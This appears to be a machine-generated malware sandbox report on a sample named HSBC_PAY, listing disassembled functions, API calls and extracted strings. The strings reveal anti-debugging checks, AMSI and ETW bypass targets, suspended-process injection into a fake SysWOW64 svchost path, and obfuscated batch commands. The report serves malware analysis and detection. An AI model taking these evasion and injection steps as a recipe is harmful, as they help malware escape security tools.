                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFromInstanceProg
                                                                    • String ID:
                                                                    • API String ID: 2151042543-0
                                                                    • Opcode ID: c7679fc2627c795ccfecea4bdea04ad3557aa82d13d79320b294a0345198b70e
                                                                    • Instruction ID: f1f20d00f245162c69f1be4faaf86e8d0679f397fec367890808e023fbec19ca
                                                                    • Opcode Fuzzy Hash: c7679fc2627c795ccfecea4bdea04ad3557aa82d13d79320b294a0345198b70e
                                                                    • Instruction Fuzzy Hash: F801F231648704AEEB15EF66DD6286BBBEEEB49F10B520835F901D2640EE349910CC60
                                                                    Function 02A9EC6C Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InetIsOffline.URL(00000000,00000000,02AAAF99,?,?,?,000002F7,00000000,00000000), ref: 02A9ECA6
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A9EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02A9EF90,UacInitialize,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString), ref: 02A9EB92
                                                                      • Part of subcall function 02A9EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A9EBA4
                                                                      • Part of subcall function 02A9EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02A9EBF8
                                                                      • Part of subcall function 02A9EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A9EC0A
                                                                      • Part of subcall function 02A9EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A9EC21
                                                                      • Part of subcall function 02A87E10: GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                      • Part of subcall function 02A8C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02BD58C8,?,02A9FBF6,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession), ref: 02A8C2FB
                                                                      • Part of subcall function 02A9DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DBE3
                                                                      • Part of subcall function 02A9DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DC13
                                                                      • Part of subcall function 02A9DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A9DC28
                                                                      • Part of subcall function 02A9DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A9DC54
                                                                      • Part of subcall function 02A9DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A9DC5D
                                                                      • Part of subcall function 02A87E34: GetFileAttributesA.KERNEL32(00000000,?,02AA2A41,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,Initialize), ref: 02A87E3F
                                                                      • Part of subcall function 02A87FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02AA2BDF,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,Initialize,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0), ref: 02A87FD5
                                                                      • Part of subcall function 02A9DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                      • Part of subcall function 02A9DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                      • Part of subcall function 02A9DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                      • Part of subcall function 02A9DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                      • Part of subcall function 02A98704: LoadLibraryW.KERNEL32(amsi), ref: 02A9870D
                                                                      • Part of subcall function 02A98704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A9876C
                                                                    • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,02AAB328), ref: 02AA49AF
                                                                      • Part of subcall function 02A9DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                      • Part of subcall function 02A9DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                      • Part of subcall function 02A9DA3C: NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02AA4BAF
                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02AA4C05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                    • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                    • API String ID: 2010126900-181751239
                                                                    • Opcode ID: 0675f849d41536afe025ed880aae6c0875d6f2d43aa35112224153fbb6cf2e53
                                                                    • Instruction ID: e1fc6c54b8017b823d6967c35708f96f9187ab38856f5aed82f914e8583e3065
                                                                    • Opcode Fuzzy Hash: 0675f849d41536afe025ed880aae6c0875d6f2d43aa35112224153fbb6cf2e53
                                                                    • Instruction Fuzzy Hash: B2240B75A8025A9FDB25FB64DE90ADE73B6FF99314F1044E2A009A7214DF30AE81DF50
                                                                    Function 02AA7870 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5348 2aa7870-2aa7c5f call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84898 5463 2aa8ae9-2aa8c6c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84898 5348->5463 5464 2aa7c65-2aa7e38 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84798 call 2a8494c call 2a84d20 call 2a84d9c CreateProcessAsUserW 5348->5464 5554 2aa9418-2aaaa1d call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c * 16 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a97b90 call 2a98184 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c ExitProcess 5463->5554 5555 2aa8c72-2aa8c81 call 2a84898 5463->5555 5573 2aa7e3a-2aa7eb1 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5464->5573 5574 2aa7eb6-2aa7fc1 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5464->5574 5555->5554 5564 2aa8c87-2aa8f5a call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a9e538 call 2a8480c call 2a8494c call 2a846a4 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a87e10 5555->5564 5820 2aa9212-2aa9413 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a849a4 call 2a98ba8 5564->5820 5821 2aa8f60-2aa920d call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84d8c * 2 call 2a84734 call 2a9dac4 5564->5821 5573->5574 5672 2aa7fc8-2aa82e8 call 2a849a4 call 2a9dc88 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a9cf9c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5574->5672 5673 2aa7fc3-2aa7fc6 5574->5673 5991 2aa82ea-2aa82fc call 2a9857c 5672->5991 5992 2aa8301-2aa8ae4 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c ResumeThread call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c CloseHandle call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97ecc call 2a98798 * 6 CloseHandle call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5672->5992 5673->5672 5820->5554 5821->5820 5991->5992 5992->5463
                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02BD57DC,02BD5820,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C), ref: 02AA7E31
                                                                    • ResumeThread.KERNEL32(00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0), ref: 02AA847B
                                                                    • CloseHandle.KERNEL32(00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C), ref: 02AA85FA
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                    • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02AE137C,02AAAFD0,UacInitialize,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C), ref: 02AA89EC
                                                                      • Part of subcall function 02A87E10: GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                      • Part of subcall function 02A9DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                      • Part of subcall function 02A9DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                      • Part of subcall function 02A9DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                      • Part of subcall function 02A9DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                      • Part of subcall function 02A98184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A9820E), ref: 02A981F0
                                                                    • ExitProcess.KERNEL32(00000000,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,Initialize,02AE137C,02AAAFD0,00000000,00000000,00000000,ScanString,02AE137C,02AAAFD0), ref: 02AAAA1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                    • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                    • API String ID: 2481178504-1225450241
                                                                    • Opcode ID: be8d60313b7af05c6e58fbf9b9d78c2fe6847ba92ec9d6fbfd4769a9ef3d08f9
                                                                    • Instruction ID: 5671974baf2a714e0d5c611b242ba09e2fe7363118d53c33aaf8c459923a9ca6
                                                                    • Opcode Fuzzy Hash: be8d60313b7af05c6e58fbf9b9d78c2fe6847ba92ec9d6fbfd4769a9ef3d08f9
                                                                    • Instruction Fuzzy Hash: 7043D775A802199FDB25FB64DE909DE73F6BF99314F1084A6A00AA7214DF30AE81DF50
